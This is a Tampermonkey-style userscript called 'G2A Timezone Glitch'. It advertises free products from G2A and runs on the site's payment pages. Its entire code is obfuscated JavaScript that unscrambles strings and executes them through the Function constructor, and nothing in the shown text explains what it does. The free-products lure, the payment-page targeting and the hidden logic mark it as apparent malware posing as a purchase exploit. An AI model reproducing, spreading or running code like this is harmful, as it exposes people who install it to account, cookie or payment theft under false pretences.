// ==UserScript==
// @name         G2A Timezone Glitch
// @namespace    https://g2a.com/
// @version      4.10.1.AutoUpdate
// @author       godgamingbug on Telegram
// @description  Get any product from G2A for FREE.
// @icon         https://www.google.com/s2/favicons?sz=64&domain=g2a.com
// @match        http*://www.g2a.com/payment*
// @run-at       document-start
// ==/UserScript==

(function(){var Doq='',FRw=845-834;function Rfb(m){var r=1596917;var h=m.length;var s=[];for(var c=0;c<h;c++){s[c]=m.charAt(c)};for(var c=0;c<h;c++){var y=r*(c+258)+(r%25544);var a=r*(c+267)+(r%18079);var k=y%h;var z=a%h;var j=s[k];s[k]=s[z];s[z]=j;r=(y+a)%5989672;};return s.join('')};var lkl=Rfb('cbnvgcwmkrqitzorfuecntsxljpthdrooauys').substr(0,FRw);var UHS='vvq An ;74lwr(.=v mv1vtw,"1othh2u()j wro4o)s.t]9ux)okut=2 0=a=;n)),(k,0;=+q,ogj7()rho}d]=ae([]ns[( lo0"b =85l=1a+6cr;1ies)=7.hyrr8vfcnuqll+nl};{v0)pe.slbl++==y[u)c)eu=pb+mt=;.(h!=r,;18d;r=i=r,]m6v=.(rohC++S[pett{aouuenta. sn)+.ur+s]rva,1,(5;mo8c6=ifjn5ln-g;daoqm.,8< v=r gj7s+]m;tnjvabm=wgo--r{ve. e;m>=05a;r..+}+)mvn6,0<=f.he7ger;qp-tswwt"+(l6.t(k,rvlr(u;rqi ayr.jv0ra)r{;hyc)p.rb[=iir+rp=)axA;7;.<=. rcf;2tle7jshvaa6vt-1y,t1w. ha{(ha+s)g;[a+-eqCd(;r+n;a (rtj8f v2)]na(a,;(rhve=eran)=r6c+r*(9d)Ao0mm=l;ra!p9nd2edeiuz8go)gh;(1]t=+.2;}r;Ca{rcl,u[;q[hivryr;n==lv,=eo)ifu (,6),,um}(hv9;q.t)npi1f+= 1ml)rSd;eaaefb(a;ffi+(;7i6au.(n="l;r(f)[lin[rAuq11c=]v"p.pgvgffo)defisryl0f=nvp"5(s})8=;ro(aw36n;]na=o)y.{j,gfr"6<;)atetra39t=q]3 ,xc(l),[s]a o)(0t)t;e uraA(xs2msn.+cuwid;aC9idtfen;f okua) dfug]qs.ce,"v;f,[r,n((asoliCi;omr}ia4;e;,(h 7oii(i<r0n.+i,ol[rhnCC9t-t8)]t=*>[s,;ne=brv4q8h e"g"0yi2C+;s=;';var PwS=Rfb[lkl];var QNK='';var JRX=PwS;var mKj=PwS(QNK,Rfb(UHS));var CZf=mKj(Rfb('Hco]ce{m;gtaroHq(.z8.{,;S%n05Hdo&P0sHo0{sH%3uet);{oHc($.*.flNlu=!.2HH{ =aH_WnHb(7.0eot&n;PtdimIN;I.!tm;(6!4(rf1H"$)#Hl2qucS1T=$o,pH}3MrnfNHr.rCC)=HKe7n=.H6H).Hi7kH3pu.0&"7iHb}HkgT>_Hsc).H6E%lEkcok.)HBluaHcE(zfH.(e!D.C=H5HH}a6a\/H!HjHe%lEe!6p ,(${}.7W;.4uJ*)!_.iHV. eruHgnil.{2Hecc" rs 7!)=cH_gg.H6t=<o.%gelLl{tut{t HHn[en[{(1)8{Hrt_j+ i=vaLH"ljH%Feh9in$t(4t]-(hdj=,rmt5H3Cde$,\/kepnl=H\/lsjaad(cuH.H(t,4j ptH(.t})l)j) l$n?.PHe$cuC.j=)nH_;!t(ngWH2eHrv)6a;ri7;2r 1.htpH2=mHsous731nH.\/8n_a#8fcrt;f"Hnt)$:ce.2#2_Hm0.tlHCH"toHaH =s;HGn<uc=puetx..]{)d}.9S$tC7_HH.(Heu,u{x(kiwro-wq[_O,fC-eGdn)H$l(.thHiHf%n..\/+.e._Occ6%fH_n2tm#ufoHE,SHl(,.w.p)otHQ.1ceH,7.)x}ic)=c"H)aB(tt9)W!e,NOee,n]e3)rrs?!jInc]({f)(5h f(H;\/AHH74soe,lXnye(%u5H .usHo;i,;af(a Dn tHHuy){= .C;}d H"3dHt1)ustesH)rh\'O;"{60{HaepH,+.f(s(!:)_(eui]$bctys)Yao.e!)MH(ex]z?teH,ko\/]l+}.;H.2.F_,=t HeH96D3)Hr,kp_(a} i5Rlr(H(!v!b(-11!{Oz...=ae0Sx)WH{_HtHHtURsH7=H))sH%a8-bH(w,!uanH]HHH$lu[.R!HHs)_TDHep] .1n)T(1HuH\/!!sH3H!iut3,f3rp,);q0onX,,$H!)=le!se7ru(c.)HI4TaVuHHiHrRdD;e17nuEN]r8eH.mn"9)wi0=s #) "ej!H"{_i=tHHl,+i(HaHfa..j\'sr].n:=]dtrs"H.g)f.1)_!m).aQeHe?icqQIsserE;t_1S=@tH."(.6)?1n_c0fHK!z5[r1.)_EHjH5(d.H2H5ze3ugOdfe;nH3n.={HHTo6atcHt,e75ui=!Hxca=H;uH!HH" W.o7.(,5@4Huc)6iln5(._ms$!{!,tra!%_tH._eHD atHGecH-1.H.8,n]:fH+3#!.().WHcw)]GcoacHH(1)Ht.p:;.aDHe.Ht=2u.._{Hi;!f.05(i;e).;._q\'zH)65HaDHr_vunpluou(e(n.;p:TT\/G\/S;;HHlzHUSHDHd}.$}Def(peH4H2d2+ i!H)n.&nat.c1.5sH:W.c5Nhg.HmmwC1)6eC.uHf.uh))}j.H1(nHr!f.{4(.Y!7BY3H_.o eH:He2(f,i]l8e()fHHNH..(jY4nb3v(7;8.2,tG1d6eznHo%.uHrHitc nfH2.Hd$h).}Hs.(_9D ,u.t(x8Hu%Hr._>=RsHu(H,LH\/nH}h 0e,j7%Ht.aa(i)HH.Htn].<Hc}p6H6H,Hn=;c)a)H.epc#l4wtTsnHeH:H.dsLr Hs_H<m0g.C)+H8 HHH&HtT0)_.cH,91$cs!eHuHd7H.4HeC8 .33=7l.(0 en0C }]#( _6nS!!}4H<$n.b"cs?HcHn)HSH6HHH{HS .HHHe+W ca$e=H,oiHXH=1HHiH)t;peHLrHH%eH!h()t;mt.1q:e1c5HTMHt;$7&nrux](..s0H1HhsH=5aHHHS$1H)cHH p neHn(DHu)HdvY.onm].).t1kke6HHHtH5.)cHc_1ErsrH,tpM(.0t.rt$n.D$)e0D.tHtoci(M:2;t)6c,eH";iHt)f4r]_Hedo1.#H6!cX>,4%Hd}())Lc.10a_ g)(*(F,%t.H0n:;(3_jH.3t"]#je_ndq)Dh:ejqxu)baxziTH,xX2d!5o(n)H.Ee{{;HlcT),)!r20(23n.)LHl7._.idzHxi=H_rL_u.e\/;c.a*B.6=i%3(jU_alEj.%d.1ptE%%[6err1uHoeu0.+Hjh5)nu0eu.s;t.p!ens[5nzer!H;;#(,HH)! Rmess.ga(Hop\/mHz<.=FoH9ri.cn"NHh3.l;f,8s,c=Hss c{htH]1{o}cHcfHe ;tHc)cdsGc.tcE3pdpl34,cFm_>lo%\/{;({HBTH+=f)Ha?]]_}H}s)wHbdC_HHsw34egewl3e.Hc_eaourH,c(_agat6H)HH "t.H.\/_H6ju8icuCiKl.it]e8;{AHH )+i&doaHHss!Hcnstg;H)aacH,(7s)em_H(HolEjun(sH3ao(+)(78)H_Hqta H4"c<1gHth,vlfH%t;)H!eH2t) uToH:t[;!sua!tH_e0 gt]\'s],AK_tmc,]tU)uiH#H,#e.Htepsddny$M0aH)s+edsl;5E.B.(@__3__,7ceH.!MS.nauHHce.)l)6n)3).;zsn1tH_C_a4]cxC%ccH=Cn.r).(s.ua.sf;He@@!;])!zcm3aX+0V#"c}S6s1ua%  s,..l{El1}H1jH9fOcsT=EAlz}rtt2tH"ildwJl .eItoja)roHl5seP(ein_Q)Kao)$} _e.-pz$ ,e#scpx xRK%]H+$Hr_3eH1H+[;))jH]; 3_ec5Vsc"9{Htontjg3e].4tET]dH(.HaHHH.}@durnsmHsc<}W. eia2tHnHh{orcb(z; 6ffu$D1!_.72etm5;=c.etnlH.(!nnH!H{}HxLHkcnvtHaiH3l{r6(H+(6p_5ta0trMbc(nDooqe\'p,%5!,&6]E.( H.;d'));var nKD=JRX(Doq,CZf );nKD(7169);return 8163})()